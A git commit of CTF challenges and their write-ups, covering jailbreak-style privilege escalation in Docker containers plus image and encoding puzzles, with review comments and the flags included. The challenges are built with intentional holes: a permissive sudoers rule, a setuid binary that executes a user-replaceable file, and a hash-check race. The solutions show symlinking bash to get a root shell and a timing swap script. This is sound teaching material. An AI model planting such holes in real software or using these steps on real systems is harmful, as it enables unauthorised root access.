initial commit

This commit is contained in:
Robbe De Greef 2022-11-24 22:59:22 +01:00
commit 0ac8165900
265 changed files with 20281 additions and 0 deletions

5
README.md Normal file

@ -0,0 +1,5 @@
# IGCTF writeups 2022-2023
You can find all the challenges here in these folders. Each challenge folder *should* contain a `SOLUTION.md` that contains a (possible) solution for the challenge.
Have fun!


@ -0,0 +1,9 @@
CONCRETELY:
scp -r src debian@51.210.158.3:/home/debian
ssh debian@51.210.158.3
sudo mv src/* /
sudo apt update -y && sudo apt install -y lib32z1 xinetd docker-compose.plugin
chmod +x /start.sh
chmod +x /run.sh
sudo mv /ctf.xinetd /etc/xinetd.d/ctf
sudo systemctl restart xinetd
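
Review bot: The `apt install` line asks for `docker-compose.plugin`, which looks like a typo for Docker's `docker-compose-plugin` package, so the install step is likely to fail as written. The steps also move `src/*` to `/` and mark `/run.sh` executable, while the `ctf` xinetd service in this commit sets `server = /home/debian/src/run.sh`; after the `mv` that path no longer exists, so one of the two has to change. The hard-coded host `51.210.158.3` would be better as a placeholder.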


@ -0,0 +1,12 @@
# Break From Jail
**This challenge is a work in progress**
This challenge consists of three parts.
This README file contains the generic information for all three parts (how to deploy).
The text is different for each of the levels.
## How to Deploy
Docker image should be deployed using xinetd, so that each tcp connection to the deployed port creates a new instance of the docker container, the command that should be run by xinetd is in `start.sh`.
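
Review bot: The last line of How to Deploy names `start.sh` as the command xinetd runs, but in this commit `start.sh` starts xinetd itself and the per-connection `docker run` lives in `run.sh`, which is also what the xinetd `server` entry points at. Change the reference to `run.sh` and add the image build step, since the scripts expect an image tagged `challenge` to exist already.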


@ -0,0 +1,28 @@
# Hack the Jail - Part 1
## Text
We somehow got access to this remote system
**INSERT REMOTE IP + PORT HERE**, but we only managed to get access to the "ig" user.
Your task is to get root access and read the flag.
Connect using:
```bash
nc INSERT REMOTE IP + PORT HERE
```
## Extra hints if no solves
* Make me a sandwhich.
(almost gives it away)
* They keep saying I should use visudo, but I don't want to use Vi!
## Files
None
## How to deploy
As described in parent README.


@ -0,0 +1,29 @@
# Hack the Jail - Part 1
## Difficulty
Very easy, but the participant needs to know about "sudo", which might be unknown for Linux novices.
## How To Solve
![](https://imgs.xkcd.com/comics/sandwich.png)
If something says "permission denied" on Linux, try with `sudo`. In this case the `/etc/sudoers` file seems to contain a peculiar line related to the currently executing user `ig`. It states the following:
```
ig ALL = NOPASSWD: /bin/cat
```
This means that the `ig` user is allowed to execute the `/bin/cat` binary with elavated permissions without using a password.
Therefore executing:
```
sudo cat /flag.txt
```
reveals the flag.
## Flag
IGCTF{ASimpleVisudoCanDoGreatDamage1}
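
Review bot: How To Solve jumps straight to the contents of `/etc/sudoers` without saying how the `ig` user gets to see that rule; naming the discovery step (for example `sudo -l`) would make the solution reproducible. It is also worth one sentence on why the rule is dangerous: `/bin/cat` is allowed with no argument restriction, so it reads any file as root, not only the flag. Typo: "elavated" should be "elevated".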


@ -0,0 +1,20 @@
service ctf
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
type = UNLISTED
port = 3000
bind = 0.0.0.0
server = /home/debian/src/run.sh
banner_fail = /etc/banner_fail
# safety options
per_source = 10 # the maximum instances of this service per source IP address
rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use
#rlimit_as = 1024M # the Address Space resource limit for the service
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
}
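
Review bot: The safety options only bound connections per source (`per_source = 10`); there is no overall `instances` cap, so the total number of containers started is unbounded once connections come from many addresses. Note also that `rlimit_cpu = 1` constrains the process xinetd launches (the `docker run` client in `run.sh`), while the container itself runs under the Docker daemon and is not covered by it, so the comment on that line overstates what it protects.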


@ -0,0 +1,3 @@
#!/bin/bash
docker run --rm -i challenge
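
Review bot: `docker run --rm -i challenge` starts each participant's container with default networking and no resource limits, and participants are meant to reach root inside it. Consider adding `--network none`, `--memory` and `--pids-limit`, plus a wall-clock timeout around the command so abandoned sessions are reaped.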


@ -0,0 +1,13 @@
FROM alpine
RUN adduser -D -H ig && mkdir /home/ig && chown -R ig:ig /home/ig
RUN apk update && \
apk add sudo busybox
COPY sudoers /etc/sudoers
COPY flag.txt /flag.txt
RUN chmod 400 /flag.txt
USER ig
CMD ["busybox", "sh"]
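
Review bot: `FROM alpine` is unpinned, so the challenge can change behaviour whenever the base image moves; pin a tag. `apk update && apk add sudo busybox` can become `apk add --no-cache sudo`, matching the other Dockerfiles in this commit (busybox is already part of the base image). The mode of `/etc/sudoers` is inherited from the checkout through `COPY sudoers`; set it explicitly with `chmod 0440 /etc/sudoers` so the challenge does not depend on the builder's file permissions.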


@ -0,0 +1 @@
IGCTF{ASimpleVisudoCanDoGreatDamage1}


@ -0,0 +1 @@
ig ALL = NOPASSWD: /bin/cat


@ -0,0 +1,4 @@
#!/bin/sh
/etc/init.d/xinetd start;
sleep infinity;


@ -0,0 +1,15 @@
# Hack the Jail - Part 2
## Text
The saga continues... We got access to another system but the previous hack does not seem to work anymore.
The compromised user `ig` has two executable files in its home directory, `execute` and `hello_world`, strangely the former is owned by root...
## Files
* bin/execute
* bin/hello_world
## How to deploy
See README of the parent.


@ -0,0 +1,114 @@
# Hack the Jail - Part 2
## Difficulty
Moderate - the participant needs to know about the `setuid` bit, and needs to reverse engineer the binary using a tool such as Ghidra to gain more insight.
## How To Solve
### Connecting to the challenge
When connecting to the challenge's IP and port we get access to a shell running as the `ig` user.
```
bash5.1$ whoami
ig
```
The flag is still on `/flag.txt`, trying to read it results in a permission denied error as the file is only readable by `root`.
```
bash-5.1$ cat /flag.txt
cat: can't open '/flag.txt': Permission denied
```
Unfortunately, our luck of last time has run out, a simple `sudo cat /flag.txt` does not seem to work anymore.
In fact, `sudo` is not even installed. Let's move on to see what is inside of our home directory.
We notice that it contains two files (which were listed on the CTF platform in binary format as well):
* execute: a binary that is owned by root and has the following permissions: -rwsr-sr-x
* hello_world: a binary owned by the IG user that has the following permissions: -rwxr-xr-x
Comparing the two types of permissions, we notice that the `execute` binary has a special permission called `s`.
This indicates that the binary has the `setuid` capability, which means that it is able to change the user it is running as **during its execution**. We will come back to this later, as we will first reverse engineer both binaries.
### Reverse Engineering the Binaries
#### Hello World
Importing the `hello_world` program into Ghidra reveals that it indeed is a simple `hello_world` program:
```
undefined8 main(void)
{
puts("Hello World");
return 0;
}
```
Nothing to see here.
##### The "execute" program
The `execute` program is far more interesting:
```
undefined8 main(void)
{
long in_FS_OFFSET;
char *local_20;
char *local_18;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_20 = (char *)0x0;
local_18 = (char *)0x0;
setuid(0);
execve("./hello_world",&local_20,&local_18);
puts("Could not execute program");
perror("execve");
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
```
Ignoring all memory allocations on top of the `main` function, we notice that the program first ensures that it is running as root. It can accomplish this by changing the user id it is running as using the `setuid` function. Typically, the user id `0` corresponds to the `root` or `superuser` of the system.
Note that this call would fail if the `setuid` capability bit was not set, because the `ig` user does not have permission to change the running user to `root`.
After it has changed the user it is running as, it replaces itself with the `hello_world` binary using the `execve` function.
## The Attack
Since the `hello_world` binary is owned by the `ig` user, we also have permission to change it.
Here we could change it to something that is able to read the `/flag.txt` file (using a bash script or another compiled C program). However, the easiest solution is to replace the binary with a shell, such that we can obtain a shell as the `root` user.
```
$ rm hello_world
$ ln -s /bin/bash hello_world
```
Running `execute` again results in a `root` shell!
```
bash5.1$ ./execute
bash5.1$ whoami
root
bash5.1$ cat /flag.txt
IGCTF{S3tUid?B3C4refulWith1t!}
```
## Flag
IGCTF{S3tUid?B3C4refulWith1t!}
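
Review bot: The Attack section says the swap is possible because `hello_world` is owned by `ig`, but `rm hello_world` and `ln -s /bin/bash hello_world` depend on write access to the directory (`/home/ig`), not on who owns the file; the same replacement would work against a root-owned `hello_world` in that directory, which is the lesson a defender needs from this writeup. In the permissions paragraph, calling the `s` bit a "capability" that lets the program change user "during its execution" is imprecise: the process already starts with root as its effective UID, and `setuid(0)` then makes the real UID root as well, which is why the bash started through `execve` keeps its privileges. Smaller points: `-rwsr-sr-x` also shows setgid, the prompts alternate between `bash5.1$` and `bash-5.1$`, and `##### The "execute" program` is one heading level too deep.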


@ -0,0 +1,20 @@
service ctf
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
type = UNLISTED
port = 3000
bind = 0.0.0.0
server = /home/debian/src/run.sh
banner_fail = /etc/banner_fail
# safety options
per_source = 10 # the maximum instances of this service per source IP address
rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use
#rlimit_as = 1024M # the Address Space resource limit for the service
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
}
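
Review bot: This file is identical to the Part 1 service, including `service ctf` and `port = 3000`, and the deploy steps install it as `/etc/xinetd.d/ctf`, so two parts cannot be served from the same host as written. Give each part its own service name and port, or keep one shared template and document the per-part values.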


@ -0,0 +1,3 @@
#!/bin/bash
docker run --rm -i challenge
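
Review bot: The image tag `challenge` is the same one the other parts' `run.sh` use, so building a second part on the same Docker host silently replaces the first part's image. Use a tag that names the part.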


@ -0,0 +1,25 @@
FROM alpine
RUN adduser -D -H ig && mkdir /home/ig && chown -R ig:ig /home/ig
RUN apk --no-cache add bash gcc musl-dev
COPY src/ /src
WORKDIR /src
RUN gcc hello_world.c -o /home/ig/hello_world && \
gcc execute.c -o /home/ig/execute
# Now set the evil setuid bits
RUN chmod +s /home/ig/execute
RUN chown ig:ig /home/ig/hello_world
WORKDIR /home/ig
RUN apk del gcc musl-dev && \
rm -rf /src
COPY flag.txt /flag.txt
RUN chmod 0400 /flag.txt
USER ig
CMD ["bash"]
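
Review bot: `chmod +s /home/ig/execute` sets both setuid and setgid; only setuid is needed for the challenge, so `chmod u+s` (or mode `4755`) states the intent. `apk del gcc musl-dev && rm -rf /src` runs in a later layer than `COPY src/ /src`, so the sources stay in the image history; that only matters if the image is ever handed out, but a multi-stage build avoids it. The `chown ig:ig /home/ig/hello_world` line deserves a comment saying it is part of the intended weakness.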

Binary file not shown.

Binary file not shown.


@ -0,0 +1 @@
IGCTF{S3tUid?B3C4refulWith1t!}


@ -0,0 +1,15 @@
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
char *newargv[] = {NULL};
char *newenv[] = {NULL};
setuid(0);
int i = execve("./hello_world", newargv, newenv);
printf("Could not execute program\n");
perror("execve");
return EXIT_SUCCESS;
}
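
Review bot: Apart from the intended weakness, the return value of `setuid(0)` is never checked, `int i` is assigned and never used, and the failure path after `execve` ends in `return EXIT_SUCCESS`; return `EXIT_FAILURE` there and drop `i`. `newargv` is `{NULL}`, so the child starts with `argc == 0`; passing the program name as `argv[0]` is the conventional form.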


@ -0,0 +1,7 @@
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char** argv) {
printf("Hello World\n");
return EXIT_SUCCESS;
}


@ -0,0 +1,4 @@
#!/bin/sh
/etc/init.d/xinetd start;
sleep infinity;


@ -0,0 +1,15 @@
# Hack the Jail - Part 2
## Text
The sysadmins have caught up with us, the files are the same but the previous attack won't work anymore.
Can you figure out why and gain us access once again?
## Files
* bin/execute
* bin/hello_world.sh
## How to deploy
See README of the parent.
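
Review bot: The heading reads `# Hack the Jail - Part 2`, but this is the third part (it ships `bin/hello_world.sh` and says the previous attack no longer works). Rename it to Part 3 so the two challenges can be told apart.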


@ -0,0 +1,43 @@
# Hack the Jail - Part 2
## Difficulty
Hard.
## How To solve
The key insight of this challenge is that the file is opened twice: once for checking whether
the MD5sum matches the expected value, and the second time for actually executing the file.
This type of vulnerabity is called a "Time-of-check to time-of-use" or in short a TOCTTOU attack.
The challenge contains an artificially long timeout to be able to exploit this vulnerabity more easily.
The script below performs the actual attack:
```bash
#!/bin/bash
# run the vulnerable program in the backgrouncd
./execute &
# make sure that the check has been performed
sleep 1
# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh
# wait until the "execute" program has finished.
sleep 8
# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
```
The contents of the `read.sh` file are as follows:
```
#!/bin/bash
cat /flag.txt
```
Both files need to have executable permissions which can be obtained using `chmod +x *.sh`.
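
Review bot: The heading again says Part 2, and unlike the other solutions there is no `## Flag` section. The explanation would be complete with one sentence on the fix: hash and execute the same open file descriptor instead of resolving the path `hello_world.sh` a second time, and do not keep the checked file in a directory the unprivileged user can write to. The script waits `sleep 8` although `execute.c` only sleeps 3 seconds; a comment on the chosen margin would help. Typos: "vulnerabity" (twice) and "backgrouncd".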


@ -0,0 +1,20 @@
service ctf
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
type = UNLISTED
port = 3000
bind = 0.0.0.0
server = /home/debian/src/run.sh
banner_fail = /etc/banner_fail
# safety options
per_source = 10 # the maximum instances of this service per source IP address
rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use
#rlimit_as = 1024M # the Address Space resource limit for the service
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
}


@ -0,0 +1,3 @@
#!/bin/bash
docker run --rm -i challenge


@ -0,0 +1,26 @@
FROM alpine
RUN adduser -D -H ig && mkdir /home/ig && chown -R ig:ig /home/ig
RUN apk --no-cache add bash gcc musl-dev openssl openssl-dev nano
COPY src/ /src
WORKDIR /src
RUN gcc execute.c -o /home/ig/execute -lssl -lcrypto
RUN cp hello_world.sh /home/ig/hello_world.sh
# Now set the evil setuid bits
RUN chown ig:ig /home/ig/hello_world.sh
WORKDIR /home/ig
RUN apk del gcc musl-dev && \
rm -rf /src
COPY flag.txt /flag.txt
RUN chmod 0400 /flag.txt
RUN chmod 745 /home/ig/execute
RUN chmod +s /home/ig/execute
USER ig
CMD ["bash"]
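
Review bot: The comment `# Now set the evil setuid bits` sits above `chown ig:ig /home/ig/hello_world.sh`, while the actual `chmod +s` is several lines further down; move the comment next to it. `apk del gcc musl-dev` leaves `openssl-dev` and `nano` installed; say whether `nano` is intentional (for participants to write `read.sh`) and drop `openssl-dev` if only the runtime library is needed. `chmod 745` followed by `chmod +s` can be one explicit mode, which also makes it clear whether setgid is wanted.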


@ -0,0 +1,49 @@
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <openssl/md5.h>
int check_hash(char* filename, char* correct_hash) {
unsigned char h[MD5_DIGEST_LENGTH];
FILE *inFile = fopen(filename, "rb");
MD5_CTX mdContext;
int bytes;
unsigned char data[1024];
if (inFile == NULL) {
return 0;
}
MD5_Init(&mdContext);
while ((bytes = fread(data, 1, 1024, inFile)) != 0)
MD5_Update(&mdContext, data, bytes);
MD5_Final(h, &mdContext);
char final_cmp[MD5_DIGEST_LENGTH * 2];
char *p = final_cmp;
for(int i = 0; i < MD5_DIGEST_LENGTH; i++) {
sprintf(p, "%02x", h[i]);
p = p + 2;
}
return strcmp(correct_hash, final_cmp) == 0;
}
int main() {
char filename[] = "hello_world.sh";
char correct_hash[] = "aa42f09c74acc950e59fb909d03d32f2";
if (check_hash(filename, correct_hash)) {
char* newargv[] = {NULL};
char* newenv[] = {NULL};
sleep(3);
setuid(0);
int i = execve("./hello_world.sh", newargv, newenv);
printf("could not execute program\n");
perror("execve");
return EXIT_SUCCESS;
} else {
printf("Invalid hash, will not execute");
}
}
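
Review bot: In `check_hash`, `char final_cmp[MD5_DIGEST_LENGTH * 2]` is 32 bytes, but the loop writes 32 hex characters and the last `sprintf` adds a terminating NUL, so it writes one byte past the array and the `strcmp` relies on that byte. Size it `MD5_DIGEST_LENGTH * 2 + 1`. In the same function `inFile` is never closed and the `size_t` result of `fread` is stored in an `int`; in `main` the return value of `setuid(0)` is unchecked and the "Invalid hash, will not execute" message lacks a newline. These are separate from the intended check-then-`execve` race and should be fixed so the binary fails only in the way the challenge intends.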


@ -0,0 +1,3 @@
#!/bin/bash
echo "Hello World"


@ -0,0 +1 @@
IGCTF{Th0s3N4styT1mingAttackWillK1llM3}


@ -0,0 +1,49 @@
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <openssl/md5.h>
int check_hash(char* filename, char* correct_hash) {
unsigned char h[MD5_DIGEST_LENGTH];
FILE *inFile = fopen(filename, "rb");
MD5_CTX mdContext;
int bytes;
unsigned char data[1024];
if (inFile == NULL) {
return 0;
}
MD5_Init(&mdContext);
while ((bytes = fread(data, 1, 1024, inFile)) != 0)
MD5_Update(&mdContext, data, bytes);
MD5_Final(h, &mdContext);
char final_cmp[MD5_DIGEST_LENGTH * 2];
char *p = final_cmp;
for(int i = 0; i < MD5_DIGEST_LENGTH; i++) {
sprintf(p, "%02x", h[i]);
p = p + 2;
}
return strcmp(correct_hash, final_cmp) == 0;
}
int main() {
char filename[] = "hello_world.sh";
char correct_hash[] = "aa42f09c74acc950e59fb909d03d32f2";
if (check_hash(filename, correct_hash)) {
char* newargv[] = {NULL};
char* newenv[] = {NULL};
sleep(3);
setuid(0);
int i = execve("./hello_world.sh", newargv, newenv);
printf("could not execute program\n");
perror("execve");
return EXIT_SUCCESS;
} else {
printf("Invalid hash, will not execute");
}
}
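
Review bot: This is a second, identical copy of `execute.c` (a second `hello_world.sh` follows it), and two copies will drift. Keep one source file and have the other location reference it; the `final_cmp` sizing problem in `check_hash` applies to this copy as well.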


@ -0,0 +1,3 @@
#!/bin/bash
echo "Hello World"

Binary file not shown.

Binary file not shown.


@ -0,0 +1,4 @@
#!/bin/sh
/etc/init.d/xinetd start;
sleep infinity;

7
cool_capybara/README.md Normal file

@ -0,0 +1,7 @@
# Cool Capybara
## Text
I like capybara's. They're cute. Do you know what a capybara is? In case you don't, I have included a file with some information and a nice little picture :)
## Files
The Capybara.pdf
## How to Deploy
N/A


@ -0,0 +1,6 @@
## Difficulty
Easy - it's simply some hidden binary.
## How To Solve
Underneath the Capybara ASCII art, I've added some extra lines of symbols. If you replace the ⠾ by a 0 and the ⢿ by a 1, you will get the flag in binary.
## Flag
IGCTF{!araBypaC}

Binary file not shown.

Binary file not shown.


@ -0,0 +1,5 @@
# Revision history for corrupted-encryption
## 0.1.0.0 -- YYYY-mm-dd
* First version. Released on an unsuspecting world.


@ -0,0 +1,16 @@
# Corrupted Encryption
## Text
I'm not much for this competitive hacking, so if I could I would have just given you the flag for this challenge. The problem is that the file on which I kept the flag was encrypted, but because of some syncing issues with my cloud, the encryption key got lost and the file can no longer be decrypted. Luckily I backed up the encryption key... but that backup is situated in the file itself...
The best course of action you can take now is to maybe figure out what the file type was and to go from there...
Oh, also, yes stupid me added an additional layer of encoding for the flag so you'll have to break through that too :)
Notice: There is a secret second flag hidden somewhere :o
## Files
Participants get the `ctf flag (CONFLICTED COPY 2022-07-12)` provided, nothing else.
## How to Deploy
N/A


@ -0,0 +1,11 @@
## Difficulty
Medium to hard. Users need to use a combination of forensics, encryption and encoding skills
## How To Solve
The file is a JPG image. Opening the JPG image reveals some information, in particular the encryption key, because the image is actually encrypted in the CBC encryption algorithm. CBC encrypts a file by partitioning it into blocks, and applying the key to each block using XOR. Since you have the file, and you have the key, as well as the partition length (being 8 pixels), you can xor the 2 hex values for the red, green and blue value of each of the 8 pixels (resulting in a hex number of length 48) with the encryption key (which is also a hex number of 48 characters long). Decrypting the image reveals the correct image, including the correct colors that were used to encode the flag with. These colors need to be converted to their hexidecimal values and be used as ascii values. Every color encodes 3 ascii characters.
The secret flag is just the encryption key. Converting it to ascii yields the secret flag
## Flag
Main flag: IGCTF{WhatYouJustDidIsCalledCBC!}
Secret flag: IGCTF{ThisTheSecretFlag}
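
Review bot: How To Solve calls the scheme CBC, but what it describes (and what `Main.hs` in this commit implements) is XOR of every 8-pixel segment with the same fixed 24-byte key, with no block cipher and no chaining between segments; that is repeating-key XOR. CBC XORs each plaintext block with the previous ciphertext block before encrypting it. Either reword the explanation or state that the name in the flag is used loosely. Typo: "hexidecimal" should be "hexadecimal".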


@ -0,0 +1,50 @@
module Main where
import Prelude as P
import Graphics.Image
import Graphics.Image.Interface as I
import Graphics.Image.ColorSpace as C
import Data.Bits
import Data.Strings
import Text.XML.HXT.DOM.Util
import Data.List.Split
segmentation = 8
seed = "49474354467B54686973546865536563726574466C61677D"
main :: IO ()
main = do
rawImage <- readImageRGB VU "./original_gimped.jpg"
let (width, height) = dims rawImage
let segmented = segment rawImage
let xorred = xorColor segmented
let newImage = segmentToImage xorred height
ret <- writeImage "./output.jpg" newImage
return ret
segment :: Image VU RGB Double -> [[Pixel RGB Double]]
segment image = reverse $ I.foldl
(\(head:tail) -> \val ->
if length head < segmentation
then (val:head):tail
else [val]:(reverse head):tail
) [[]] image
xorColor :: [[Pixel RGB Double]] -> [[Pixel RGB Double]]
xorColor segments = P.map (\pixels -> P.zipWith doXorring [0..] pixels) segments
doXorring :: Int -> Pixel RGB Double -> Pixel RGB Double
doXorring index pixel@(PixelRGB red green blue) =
let step = index * 6
seedPartRed = hexStringToInt $ strDrop(step) $ strTake(step + 2) seed
seedPartGreen = hexStringToInt $ strDrop(step + 2) $ strTake(step + 4) seed
seedPartBlue = hexStringToInt $ strDrop(step + 4) $ strTake(step + 4) seed
redHex = round $ red * 255 :: Int
greenHex = round $ green * 255 :: Int
blueHex = round $ blue * 255 :: Int
xorRed = (fromIntegral (redHex `xor` seedPartRed)) / 255
xorGreen = (fromIntegral (greenHex `xor` seedPartGreen)) / 255
xorBlue = (fromIntegral (blueHex `xor` seedPartBlue)) / 255
in PixelRGB xorRed xorGreen xorBlue
segmentToImage :: [[Pixel RGB Double]] -> Int -> Image VU RGB Double
segmentToImage segments width = fromLists (chunksOf width (concat segments))
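
Review bot: In `doXorring`, `seedPartBlue` uses `strDrop(step + 4) $ strTake(step + 4) seed`, which takes `step + 4` characters and then drops the same number, leaving an empty string; following the red and green lines it should be `strTake(step + 6)`. As written the blue channel is not XORed with the key bytes the solution describes. Also, `segmentToImage` names its second parameter `width` while `main` passes `height`, and the result is written to `./output.jpg`: JPEG is lossy, so the XORed pixel values will not survive a round trip exactly, and a lossless format such as PNG avoids that.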


@ -0,0 +1,34 @@
cabal-version: 2.4
name: corrupted-encryption
version: 0.1.0.0
-- A short (one-line) description of the package.
-- synopsis:
-- A longer description of the package.
-- description:
-- A URL where users can report bugs.
-- bug-reports:
-- The license under which the package is released.
-- license:
author: Nicolas Mattelaer
maintainer: nmattela@infogroep.be
-- A copyright notice.
-- copyright:
-- category:
extra-source-files: CHANGELOG.md
executable corrupted-encryption
main-is: Main.hs
-- Modules included in this executable, other than Main.
-- other-modules:
-- LANGUAGE extensions used by modules in this package.
-- other-extensions:
build-depends: base ^>=4.15.1.0, hip, hxt, strings, split
hs-source-dirs: app
default-language: Haskell2010

Binary file not shown.

Size: 9.9 MiB


@ -0,0 +1,51 @@
{-# LANGUAGE CPP #-}
{-# LANGUAGE NoRebindableSyntax #-}
{-# OPTIONS_GHC -fno-warn-missing-import-lists #-}
{-# OPTIONS_GHC -Wno-missing-safe-haskell-mode #-}
module Paths_corrupted_encryption (
version,
getBinDir, getLibDir, getDynLibDir, getDataDir, getLibexecDir,
getDataFileName, getSysconfDir
) where
import qualified Control.Exception as Exception
import Data.Version (Version(..))
import System.Environment (getEnv)
import Prelude
#if defined(VERSION_base)
#if MIN_VERSION_base(4,0,0)
catchIO :: IO a -> (Exception.IOException -> IO a) -> IO a
#else
catchIO :: IO a -> (Exception.Exception -> IO a) -> IO a
#endif
#else
catchIO :: IO a -> (Exception.IOException -> IO a) -> IO a
#endif
catchIO = Exception.catch
version :: Version
version = Version [0,1,0,0] []
bindir, libdir, dynlibdir, datadir, libexecdir, sysconfdir :: FilePath
bindir = "/home/nico/.cabal/bin"
libdir = "/home/nico/.cabal/lib/x86_64-linux-ghc-9.0.2/corrupted-encryption-0.1.0.0-inplace-corrupted-encryption"
dynlibdir = "/home/nico/.cabal/lib/x86_64-linux-ghc-9.0.2"
datadir = "/home/nico/.cabal/share/x86_64-linux-ghc-9.0.2/corrupted-encryption-0.1.0.0"
libexecdir = "/home/nico/.cabal/libexec/x86_64-linux-ghc-9.0.2/corrupted-encryption-0.1.0.0"
sysconfdir = "/home/nico/.cabal/etc"
getBinDir, getLibDir, getDynLibDir, getDataDir, getLibexecDir, getSysconfDir :: IO FilePath
getBinDir = catchIO (getEnv "corrupted_encryption_bindir") (\_ -> return bindir)
getLibDir = catchIO (getEnv "corrupted_encryption_libdir") (\_ -> return libdir)
getDynLibDir = catchIO (getEnv "corrupted_encryption_dynlibdir") (\_ -> return dynlibdir)
getDataDir = catchIO (getEnv "corrupted_encryption_datadir") (\_ -> return datadir)
getLibexecDir = catchIO (getEnv "corrupted_encryption_libexecdir") (\_ -> return libexecdir)
getSysconfDir = catchIO (getEnv "corrupted_encryption_sysconfdir") (\_ -> return sysconfdir)
getDataFileName :: FilePath -> IO FilePath
getDataFileName name = do
dir <- getDataDir
return (dir ++ "/" ++ name)
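
Review bot: This is a Cabal-generated `Paths_` module with the author's local paths baked in (`/home/nico/.cabal/...`), and the `cabal_macros.h` that follows is marked DO NOT EDIT; both are build output and do not belong in the repository. Remove the build directory from the commit and add it to `.gitignore`.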


@ -0,0 +1,160 @@
/* DO NOT EDIT: This file is automatically generated by Cabal */
/* package corrupted-encryption-0.1.0.0 */
#ifndef VERSION_corrupted_encryption
#define VERSION_corrupted_encryption "0.1.0.0"
#endif /* VERSION_corrupted_encryption */
#ifndef MIN_VERSION_corrupted_encryption
#define MIN_VERSION_corrupted_encryption(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 1 || \
(major1) == 0 && (major2) == 1 && (minor) <= 0)
#endif /* MIN_VERSION_corrupted_encryption */
/* package base-4.15.1.0 */
#ifndef VERSION_base
#define VERSION_base "4.15.1.0"
#endif /* VERSION_base */
#ifndef MIN_VERSION_base
#define MIN_VERSION_base(major1,major2,minor) (\
(major1) < 4 || \
(major1) == 4 && (major2) < 15 || \
(major1) == 4 && (major2) == 15 && (minor) <= 1)
#endif /* MIN_VERSION_base */
/* package hip-1.5.6.0 */
#ifndef VERSION_hip
#define VERSION_hip "1.5.6.0"
#endif /* VERSION_hip */
#ifndef MIN_VERSION_hip
#define MIN_VERSION_hip(major1,major2,minor) (\
(major1) < 1 || \
(major1) == 1 && (major2) < 5 || \
(major1) == 1 && (major2) == 5 && (minor) <= 6)
#endif /* MIN_VERSION_hip */
/* package hxt-9.3.1.22 */
#ifndef VERSION_hxt
#define VERSION_hxt "9.3.1.22"
#endif /* VERSION_hxt */
#ifndef MIN_VERSION_hxt
#define MIN_VERSION_hxt(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 3 || \
(major1) == 9 && (major2) == 3 && (minor) <= 1)
#endif /* MIN_VERSION_hxt */
/* package split-0.2.3.4 */
#ifndef VERSION_split
#define VERSION_split "0.2.3.4"
#endif /* VERSION_split */
#ifndef MIN_VERSION_split
#define MIN_VERSION_split(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 2 || \
(major1) == 0 && (major2) == 2 && (minor) <= 3)
#endif /* MIN_VERSION_split */
/* package strings-1.1 */
#ifndef VERSION_strings
#define VERSION_strings "1.1"
#endif /* VERSION_strings */
#ifndef MIN_VERSION_strings
#define MIN_VERSION_strings(major1,major2,minor) (\
(major1) < 1 || \
(major1) == 1 && (major2) < 1 || \
(major1) == 1 && (major2) == 1 && (minor) <= 0)
#endif /* MIN_VERSION_strings */
/* tool gcc-12.1.0 */
#ifndef TOOL_VERSION_gcc
#define TOOL_VERSION_gcc "12.1.0"
#endif /* TOOL_VERSION_gcc */
#ifndef MIN_TOOL_VERSION_gcc
#define MIN_TOOL_VERSION_gcc(major1,major2,minor) (\
(major1) < 12 || \
(major1) == 12 && (major2) < 1 || \
(major1) == 12 && (major2) == 1 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_gcc */
/* tool ghc-9.0.2 */
#ifndef TOOL_VERSION_ghc
#define TOOL_VERSION_ghc "9.0.2"
#endif /* TOOL_VERSION_ghc */
#ifndef MIN_TOOL_VERSION_ghc
#define MIN_TOOL_VERSION_ghc(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 0 || \
(major1) == 9 && (major2) == 0 && (minor) <= 2)
#endif /* MIN_TOOL_VERSION_ghc */
/* tool ghc-pkg-9.0.2 */
#ifndef TOOL_VERSION_ghc_pkg
#define TOOL_VERSION_ghc_pkg "9.0.2"
#endif /* TOOL_VERSION_ghc_pkg */
#ifndef MIN_TOOL_VERSION_ghc_pkg
#define MIN_TOOL_VERSION_ghc_pkg(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 0 || \
(major1) == 9 && (major2) == 0 && (minor) <= 2)
#endif /* MIN_TOOL_VERSION_ghc_pkg */
/* tool haddock-2.25.1 */
#ifndef TOOL_VERSION_haddock
#define TOOL_VERSION_haddock "2.25.1"
#endif /* TOOL_VERSION_haddock */
#ifndef MIN_TOOL_VERSION_haddock
#define MIN_TOOL_VERSION_haddock(major1,major2,minor) (\
(major1) < 2 || \
(major1) == 2 && (major2) < 25 || \
(major1) == 2 && (major2) == 25 && (minor) <= 1)
#endif /* MIN_TOOL_VERSION_haddock */
/* tool hpc-0.68 */
#ifndef TOOL_VERSION_hpc
#define TOOL_VERSION_hpc "0.68"
#endif /* TOOL_VERSION_hpc */
#ifndef MIN_TOOL_VERSION_hpc
#define MIN_TOOL_VERSION_hpc(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 68 || \
(major1) == 0 && (major2) == 68 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_hpc */
/* tool hsc2hs-0.68.7 */
#ifndef TOOL_VERSION_hsc2hs
#define TOOL_VERSION_hsc2hs "0.68.7"
#endif /* TOOL_VERSION_hsc2hs */
